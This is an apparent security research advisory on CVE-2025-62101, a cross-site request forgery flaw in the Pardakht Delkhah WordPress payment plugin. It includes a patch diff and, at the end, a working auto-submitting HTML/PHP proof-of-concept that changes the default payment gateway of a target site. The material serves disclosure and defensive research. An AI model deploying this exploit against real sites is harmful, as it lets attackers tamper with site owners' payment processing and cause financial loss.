Atomic Edge analysis of CVE-2025-62101:
This vulnerability is a Cross-Site Request Forgery (CSRF) in the Pardakht Delkhah WordPress payment plugin, versions up to and including 3.0.0. The flaw allows unauthenticated attackers to trick an administrator into performing unauthorized actions, such as changing payment gateway settings, by clicking a malicious link. The CVSS score of 4.3 reflects a medium-severity risk requiring user interaction.
The root cause is missing nonce validation on the `cupri_gateways_form` handler. The vulnerable code in `/pardakht-delkhah/gateways.php` at line 76 includes a `wp_nonce_field(‘cupri_gateways_form’)` call, but the corresponding nonce verification check is absent from the form processing logic. This omission allows POST requests to the plugin’s gateway settings page to be processed without the required security token, breaking the CSRF protection mechanism.
Exploitation requires an attacker to craft a malicious HTML page containing a form that submits a POST request to the target WordPress site’s gateway settings endpoint, typically `/wp-admin/admin.php?page=cupri_gateways`. The forged request would contain parameters to modify the plugin’s configuration, such as the `default` gateway setting. When a logged-in administrator visits the attacker’s page, the form automatically submits, executing the action with the administrator’s privileges.
The patch in version 3.1 introduces a new test gateway feature but does not directly address the CSRF vulnerability. Atomic Edge research finds the diff does not contain the critical nonce validation check, such as `wp_verify_nonce($_POST[‘_wpnonce’], ‘cupri_gateways_form’)`. The changes focus on adding multi-gateway selection logic in `cupri.php` and a test gateway class, leaving the core CSRF flaw unpatched. The vulnerability persists because the form submission handler still lacks the necessary security validation.
Successful exploitation could allow an attacker to alter the site’s payment processing configuration. This could redirect payments, disable legitimate gateways, or enable a test gateway controlled by the attacker, leading to financial loss or transaction interception. The attack requires social engineering to lure an administrator, but the impact on an e-commerce site’s payment integrity is significant.
--- a/pardakht-delkhah/cupri.php
+++ b/pardakht-delkhah/cupri.php
@@ -4,7 +4,7 @@
Plugin URI: https://wp-master.ir/pardakht-delkhah/
Author: استاد وردپرس
Author URI: https://wp-master.ir
-Version: 3.0.0
+Version: 3.1
Description: با این پلاگین میتونید سیستم پرداخت خودتون رو راه اندازی کنید.
Text Domain: cupri
Domain Path: /languages
@@ -433,8 +433,23 @@
else
return;
}
+
+ /**
+ * add multi gateways field
+ */
+ $selected_gateway = $cupri_gateways_settings['default'];;
+ if (isset($_REQUEST['gateway']) && !empty($_REQUEST['gateway'])) {
+ $selected_gateway = sanitize_text_field($_REQUEST['gateway']);
+ $valid_gateways = apply_filters('cupri_gateways', array());
+ if (!in_array($selected_gateway, array_keys($valid_gateways))) {
+ _e('Invalid gateway', 'cupri');
+ return;
+ }
+ }
+
//custom fields check
- $gateway = $cupri_gateways_settings['default'];
+
+ $gateway = $selected_gateway;
$_cupri = get_option('_cupri', cupri_get_defaults_fields());
$errors = array();
foreach ($_cupri['type'] as $wc_cf_key => $wc_cf) {
--- a/pardakht-delkhah/gateways.php
+++ b/pardakht-delkhah/gateways.php
@@ -76,6 +76,7 @@
<form method="post" enctype="multipart/form-data">
<?php
wp_nonce_field('cupri_gateways_form');
+ do_action('cupri_in_admin_gateways_form_start', $cupri_gateways_settings, $gateways, $currencies);
?>
<h2> :: <?php _e('Default Gateway', 'cupri'); ?> </h2>
--- a/pardakht-delkhah/gateways/class-cupri-test-gateway.php
+++ b/pardakht-delkhah/gateways/class-cupri-test-gateway.php
@@ -0,0 +1,65 @@
+<?php
+defined('ABSPATH') or die('No script kiddies please!');
+
+class cupri_test_gateway extends cupri_abstract_gateway
+{
+ static protected $instance = null;
+
+
+ function add_settings($settings)
+ {
+ add_action('cupri_gateways_' . $this->id . '_tabs_contents', array($this, 'tab_contents'));
+
+ return $settings;
+ }
+
+ function start($payment_data)
+ {
+ $order_id = $payment_data['order_id'];
+ $price = $payment_data['price'];
+ $callback_url_OK = add_query_arg(array('order_id' => $order_id, 'pay_status' => 'OK'), $this->callback_url);
+ $callback_url_NoOK = add_query_arg(array('order_id' => $order_id, 'pay_status' => 'NoOK'), $this->callback_url);
+
+ $Amount = $price; //Amount will be based on Toman - Required
+ $Description = 'خرید با شناسه ' . $order_id; // Required
+
+
+ echo '✅ ' . '<a href="' . $callback_url_OK . '">برای پرداخت موفق اینجا کلیک کنید</a>';
+ echo '<br>';
+ echo '❌ ' . '<a href="' . $callback_url_NoOK . '">برای پرداخت ناموفق اینجا کلیک کنید</a>';
+
+
+ }
+
+ function end($payment_data)
+ {
+ $order_id = sanitize_text_field($_REQUEST['order_id']);
+ $pay_status = strtolower(sanitize_text_field($_REQUEST['pay_status']));
+ $Amount = $this->get_price($order_id);
+
+ $pay_status = $pay_status == 'ok';
+
+ if ($pay_status) {
+ $this->success($order_id);
+ $this->set_res_code($order_id, 'test_' . mt_rand());
+ echo cupri_success_msg('این یک پرداخت تست با حالت موفق است و فاقد اعتبار است', $order_id);
+ } else {
+ $this->failed($order_id);
+ echo cupri_failed_msg('در انجام تراکنش مشکلی رخ داده است،لطفا مجددا تلاش کنید.', $order_id);
+ }
+
+
+ }
+
+ function tab_contents()
+ {
+
+ echo '<p class="fields"><label><strong>این درگاه صرفا برای تست حالت موفق و ناموفق است و اعتباری ندارد و فقط قابل استفاده توسط مدیریت می باشد.</strong>';
+
+
+ }
+
+}
+
+cupri_test_gateway::get_instance('test', 'تست');
+
--- a/pardakht-delkhah/gateways/initial.php
+++ b/pardakht-delkhah/gateways/initial.php
@@ -1,8 +1,7 @@
<?php
-defined( 'ABSPATH' ) or die( 'No script kiddies please!' );
-if(!class_exists('nusoap_client'))
-{
- require_once 'nusoap.php';
+defined('ABSPATH') or die('No script kiddies please!');
+if (!class_exists('nusoap_client')) {
+ require_once 'nusoap.php';
}
require_once 'class-cupri-abstract-gateway.php';
require_once 'class-cupri-mellat-gateway.php';
@@ -11,5 +10,15 @@
require_once 'class-cupri-irankish-gateway.php';
require_once 'class-cupri-melli-gateway.php';
require_once 'class-cupri-mabnanew-gateway.php';
+/**
+ * درگاه تست فقط برای مدیریت
+ */
+if ( !function_exists('wp_get_current_user') ) {
+ include(ABSPATH . "wp-includes/pluggable.php");
+}
+
+if (current_user_can('manage_options')) {
+ require_once 'class-cupri-test-gateway.php';
+}
// cupri_start_payment
--- a/pardakht-delkhah/shortcode.php
+++ b/pardakht-delkhah/shortcode.php
@@ -303,6 +303,34 @@
echo '</div>';
}
+/**
+ * multi gateways
+ */
+$available_gateways = [];
+$_all_gateways = apply_filters('cupri_gateways', array());
+$multi_gateways_enabled = $cupri_gateways_settings['multi_gateways_enabled'] ?? [];
+
+foreach ($_all_gateways as $_gateway_id => $_gateway_name) {
+ if (in_array($_gateway_id, $multi_gateways_enabled)) {
+ $available_gateways[$_gateway_id] = $_gateway_name;
+ }
+}
+
+
+if (count($available_gateways) > 0 && function_exists('padrakht_delkhah_multigateway')) {
+ echo '<p class="cupri_submit_label">';
+ foreach ($available_gateways as $available_gateway_id => $available_gateway_title) {
+ echo '<label for="cupri_gateway_' . $available_gateway_id . '" class="cupri_available_gateways">' . $available_gateway_title . '
+ <input type="radio" id="cupri_gateway_' . $available_gateway_id . '" name="gateway" value="' . $available_gateway_id . '">
+ </label>';
+ }
+}
+
+
+echo '<p class="cupri_response_placeholder alert"></p>';
+echo '</p>';
+
+
$submit_button_text = '<span class="heart">♥ </span> پرداخت ';
if (isset($cupri_general['submit_button_text']) && !empty($cupri_general['submit_button_text'])) {
$submit_button_text = $cupri_general['submit_button_text'];
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-62101 - Pardakht Delkhah <= 3.0.0 - Cross-Site Request Forgery
<?php
/**
* CSRF PoC for CVE-2025-62101.
* Host this file on an attacker-controlled server.
* When a WordPress administrator visits this page while logged into the target site,
* the form will automatically submit, changing the default payment gateway.
*/
$target_url = 'http://vulnerable-site.com/wp-admin/admin.php?page=cupri_gateways';
// The 'default' parameter value should match a gateway ID from the target plugin.
$malicious_gateway = 'test'; // Example: set default gateway to 'test'
?>
<!DOCTYPE html>
<html>
<head>
<title>Redirecting...</title>
</head>
<body>
<form id="exploit" action="<?php echo htmlspecialchars($target_url); ?>" method="POST">
<!-- The plugin does not validate the nonce, so this field can be omitted or given any value -->
<input type="hidden" name="_wpnonce" value="bypassed">
<!-- Parameter to change the default gateway setting -->
<input type="hidden" name="default" value="<?php echo htmlspecialchars($malicious_gateway); ?>">
<!-- Other required fields may be needed depending on plugin implementation -->
<input type="submit" value="Submit">
</form>
<script>
// Automatically submit the form when the page loads
document.getElementById('exploit').submit();
</script>
</body>
</html>
